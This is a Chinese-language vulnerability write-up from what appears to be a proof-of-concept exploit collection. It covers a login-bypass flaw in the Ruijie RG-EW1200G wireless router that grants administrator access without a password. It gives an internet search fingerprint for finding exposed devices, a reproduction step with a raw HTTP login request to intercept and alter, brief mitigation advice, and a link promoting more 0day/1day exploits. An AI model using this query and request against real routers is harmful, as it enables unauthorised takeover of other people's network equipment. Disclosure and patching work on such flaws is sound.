》》》产品描述《《《
锐捷网络RG-EW1200G是一款有线无线全千兆双频无线路由器Q,适合平层家居、别墅、小型店铺、SOHO办公等场景使用。设备性能卓越,足以满足千兆上网需求;信号强劲,信号功率功率提升3倍,覆盖距离提升近1倍覆盖能力强。
》》》漏洞描述《《《
锐捷网络 RG-EW1200G 存在登录绕过逻辑漏洞,允许任何用户无需密码即可获得设备管理员权限
》》》搜索语句《《《
body="static/css/app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
》》》漏洞复现《《《
登录时抓包修改账号
POST /api/sys/login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Length: 66
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded{"username":"2","password":"1231111111","timestamp":1692412880000}
》》》修复建议《《《
为了确保系统安全,建议你采取以下措施:首先,除非特别需要,尽量不要让系统连上互联网,以减少被黑客攻击的风险。其次,通过防火墙等安全设备设定访问规则,只允许经过批准的设备访问系统,这样可以有效控制谁能进入系统。最后,务必将产品更新到最新版本,以及时修复已知的安全漏洞,保持系统的安全性。
-------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------
更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)
-------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------
